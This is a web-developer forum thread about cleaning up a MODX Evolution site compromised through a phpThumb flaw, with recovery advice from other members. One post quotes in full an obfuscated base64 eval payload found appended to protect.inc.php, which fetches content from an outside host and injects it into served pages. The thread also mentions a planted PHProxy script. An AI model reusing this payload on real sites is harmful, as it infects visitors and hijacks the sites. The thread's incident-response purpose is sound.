We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 24708
    • 8 Posts
    Hello, I am working to re-install a site that was compromised by phpThumb. (See security notice here: http://modxcms.com/forums/index.php/topic,55314.0.html)

    I’m working with PHP5 on the server, Modx Evolution 1.0.4, phpThumb v1.7.9 (according to the changelog)

    Here is the history:

    The server shut down the site due to excessive use of the server processor. In response I patched the original vulnerability in phpThumbs, and instructed the server to switch the site back on.

    It seems that they were able to continue abusing the server though and it lead to the site being blacklisted by Google.

    I immediately moved the domain name to a different web host so that we could notify Google that the site was no longer spreading exploits and request that the site be removed from the blacklist -- which they did promptly.

    Now I am reinstalling the site but have not restored the MySQL database as I am worried that I’ll simply be keeping the malicious code. Can anyone give me tips about how to find the code and strip it out of the database? Has anyone else who has been compromised by this security issue found the malicious code?

    Any help would be tremendous. Thank you in advance.
      • 18373 ☆ A M B ☆
      • 3,141 Posts
      The nasties may be in the code. (also see: http://modxcms.com/forums/index.php/topic,54874.msg316279.html#msg316279)

      It’s virtually impossible to figure out what was damaged by such an exploit: you have to assume that EVERYTHING has been compromised. If you have a backup, you should rollback to that, and you should apply the patch as listed above. If you don’t have a backup, you have to rebuild from known-good versions: a fresh install of MODx and any plugins, but the pisser about this phpThumb thing is that in 1.7.9 (the most current version as of this writing), the exploit is in source code, so you have to manually apply the patch, otherwise your site is vulnerable.

      So I’d advice to download the latest version of Evo and start rebuilding your site from that. Don’t upload your old assets folder onto the new server (the nasties may just be in there) but only use the files that you are using in your website.
        Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

        Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
        • 24708
        • 8 Posts
        Thank you! This is basically what I have done... Tried to for the most part... I didn’t have a clean version of the database, unfortunately. Fingers crossed! Anything I can do to monitor the site at this point?

          • 24708
          • 8 Posts
          I just located a file in the old site directory called "data"

          In it are three documents: index.inc.php, index.php, and style.css.

          It is a script called PHProxy. Is this something anyone has heard of? I am hesitant to post the script here for fear it is, in fact, malicious. I found this about it by doing a search: PHProxy is a web HTTP proxy designed to bypass proxy restrictions through a web interface very similar to the popular CGIProxy. You simply supply a URL to the form and click Browse. The script then accesses that URL, and if it has any HTML contents, it modifies any URLs so that they point back to the script.

          Sounds sketchy. My knowledge of PHP is not good enough to determine exactly what this is. But the functions look strange to me for not being included in the modx install... "function url_parse" "function complete_url" as well as a "$_proxify" variable... among many others that look suspicious to me. But maybe I’m jumping to conclusions. Does MoxX utilize some kind of PHP proxy for it’s internal purposes?

          Thanks for any help!



            • 18373 ☆ A M B ☆
            • 3,141 Posts
            Sounds like they can visit other sites through those files.

            *any* site.


            All MODx files have the copyright notice on top (afaik) and will make use of the $modx class. If none of that is in the file I guess they can be deleted.

            Could also cross-check the downloaded package.


            As a FYI: Evo 1.0.5-RC1 has been released yesterday and solves several security issues.
              Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

              Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
              • 24708
              • 8 Posts
              Thank you!

              i also found this at the end of the protect.inc.php file:

              eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInBrdmtfeWh5ayIpICYmICFmdW5jdGlvbl9leGlzdHMoIndzd19lbnR2YyIpICYmICFmdW5jdGlvbl9leGlzdHMoImJxbV9lYWMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJhIl0pICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJnb29nbGVib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksIm1zbmJvdCIpID09PSBmYWxzZSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwieWFob28iKSA9PT0gZmFsc2UgJiYgIWlzc2V0KCRfQ09PS0lFWyJlamRiIl0pICl7JEdMT0JBTFNbImJhIl0gPSAxO3NldGNvb2tpZSgiZWpkYiIsIDEsIHRpbWUoKSszNjAwKjI0KjgsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb24gd3N3X2VudHZjKCRnemVuY29kZV9hcmcpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAkeCA9IEBvcmQoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAzLCAxKSk7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IDEwOw0KICAgICAgICAgICAgICAgICAgICAkc2hpZnQyID0gMDsNCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjQgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkdW5wYWNrPUB1bnBhY2soInYiLCBzdWJzdHIoJGd6ZW5jb2RlX2FyZywgMTAsIDIpKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICR1bnBhY2s9JHVucGFja1sxXTsgJHNoaWZ0Kz0gMiArICR1bnBhY2s7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjggKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNocigwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjE2ICkNCiAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgJHNoaWZ0ID0gQHN0cnBvcygkZ3plbmNvZGVfYXJnLCBjaHIoMCksICRzaGlmdCkgKyAxOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIGlmKCAkeCYyICkNCiAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgJHNoaWZ0ICs9IDI7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgJGd6aXAgPSBAZ3ppbmZsYXRlKEBzdWJzdHIoJGd6ZW5jb2RlX2FyZywgJHNoaWZ0KSk7DQogICAgICAgICAgICAgICAgICAgIGlmKCRnemlwID09PSBGQUxTRSkNCiAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgJGd6aXAgPSAkZ3plbmNvZGVfYXJnOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIHJldHVybiAkZ3ppcDsNCiAgICAgICAgICAgICAgICB9DQoNCiAgICBmdW5jdGlvbiBicW1fZWFjKCAkdXJsICkgew0KDQovKiAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKQ0KICAgICAgICB7DQogICAgICAgICAgJGNoID0gY3VybF9pbml0KCR1cmwpOw0KICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsNCiAgICAgICAgICAgICRjdXJsX3Jlc3VsdCA9IGN1cmxfZXhlYyAoJGNoKTsNCiAgICAgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsNCiAgICAgICAgICAgIGlmICgkY3VybF9yZXN1bHQpIHJldHVybiAkY3VybF9yZXN1bHQ7DQogICAgICAgIH0NCg0KICAgICAgICBpZiAoQGluaV9nZXQoImFsbG93X3VybF9mb3BlbiIpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkZmlsZV9yZXN1bHQgPSBAZmlsZV9nZXRfY29udGVudHMoJHVybCk7DQogICAgICAgICAgICBpZiAoJGZpbGVfcmVzdWx0KSByZXR1cm4gJGZpbGVfcmVzdWx0Ow0KICAgICAgICB9ICAgKi8NCg0KICAgICAgICAkdXJsX2luZm8gPSBwYXJzZV91cmwoJHVybCk7DQogICAgICAgICRxdWVyeSAgPSAiR0VUICR1cmwgSFRUUC8xLjBcclxuIjsNCiAgICAgICAgJHF1ZXJ5IC49ICJIb3N0OiAiIC4gJHVybF9pbmZvWyJob3N0Il0gLiAiXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiI7DQogICAgICAgICRmcCA9IEBmc29ja29wZW4oJHVybF9pbmZvWyJob3N0Il0sIDgwLCAkZXJybm8sICRlcnJzdHIsIDUpOw0KICAgICAgICBpZiAoISRmcCkgcmV0dXJuIGZhbHNlOw0KICAgICAgICBAZnB1dHMoJGZwLCAkcXVlcnkpOw0KICAgICAgICBAc29ja2V0X3NldF90aW1lb3V0ICgkZnAsIDUsIDApOw0KICAgICAgICAkc19yZXRjb2RlID0gQHN1YnN0ciAoQGZnZXRzICgkZnAsIDQwOTYpLCA5LCAzKTsNCiAgICAgICAgaWYgKCRzX3JldGNvZGV7MH0gPD4gIjIiKSB7cmV0dXJuIEZBTFNFO30NCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpDQogICAgICAgIHsNCiAgICAgICAgICAgIGlmICgiXHJcbiIgPT09IEBmZ2V0cyAoJGZwLCA0MDk2KSkge2JyZWFrO30NCiAgICAgICAgfQ0KICAgICAgICAkc29ja2V0X3Jlc3VsdCA9ICIiOw0KICAgICAgICB3aGlsZSAoISBAZmVvZiAoJGZwKSkgew0KICAgICAgICAgICAgJHNvY2tldF9yZXN1bHQgLj0gQGZnZXRzICgkZnAsIDQwOTYpOw0KICAgICAgICB9DQogICAgICAgIEBmY2xvc2UoJGZwKTsNCiAgICAgICAgaWYgKCRzb2NrZXRfcmVzdWx0KSByZXR1cm4gJHNvY2tldF9yZXN1bHQ7DQogICAgfQ0KICAgIGZ1bmN0aW9uIHBrdmtfeWh5aygkdXJ5KXtnbG9iYWwgJGZhbXFfY29rO3JldHVybiBwcmVnX3JlcGxhY2UoIiMoPC90YWJsZT4uKjx0ZD58PC90YWJsZT58PC9kaXY+W148Pl0qPGRpdltePD5dKj58PC9ib2R5PikjaXMiLCAiJDEiIC4gJGZhbXFfY29rLCB3c3dfZW50dmMoJHVyeSksIDEpOw0KICAgIH0kZmFtcV9jb2s9YnFtX2VhYyhiYXNlNjRfZGVjb2RlKCJhSFIwY0RvdkwyZGpiM1Z1ZEdWeUxtTnVMMmx1Wm04dWNHaHciKSAuICI/aT0iIC4gJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pO0BwcmVnX21hdGNoKCIjPG9wZW4+KC4qKTwvY2xvc2U+IyIsICRmYW1xX2NvaywgJG1hdGNoZXMpOyRmYW1xX2Nvaz0gaXNzZXQoJG1hdGNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGZhbXFfY29rKSAgb2Jfc3RhcnQoInBrdmtfeWh5ayIpO30="));
              


                • 18373 ☆ A M B ☆
                • 3,141 Posts
                Yep... that’s malicious code.


                Did you rebuild from a fresh install?
                  Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

                  Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
                  • 24708
                  • 8 Posts
                  I did. I found that by comparing my newly installed "clean" site with the old site.

                  Here’s what I’ve done:

                  -Changed servers.

                  -Installed clean modX.

                  -Installed as many clean snippets and plugins as possible, with a few exceptions because I couldn’t locate a download.

                  -Checked the remaining snippets by hand for malicious code.

                  -Searched database as much as possible for malicious code.

                  -Restored database (My client did not have a backup)

                  All of the bad files and code was found by running the comparison. I’m hoping that’s a good sign.

                  I will update to the new version of modX evo as well.

                  Anything I can do better? more?

                  Thanks for all the help. This is my first time dealing with a hack.
                    • 18373 ☆ A M B ☆
                    • 3,141 Posts
                    I’ve not yet been struck by a MODx exploit myself (although I did just remove 5 files of malware from one of my servers, but that was due to an unprotected file upload form.. that’s asking for trouble tongue).

                    These exploits, from what I’ve read, mainly affect files, so if you’ve sweeped up that you’re on the right track I guess. Evo 1.0.5-rc addresses some possible exploits too so that’s definitely a good way to go.
                      Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

                      Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
                      • 9207 ☆ A M B ☆
                      • 2,475 Posts
                      Basically, recovering from one of these bad boys boils down to some basic repeatable things:

                      1. Reset all passwords
                      2. Clean out all infected code, reinstall from fresh copies whenever possible
                      3. Implement that phpThumb patch
                      4. If you got a firewall on your server, limit requests to your pages, especially manager stuff
                      5. Watch your permissions -- usually I’ve found these hacks in the directories that have loose permissions -- inside assets/cache or assets/files for example.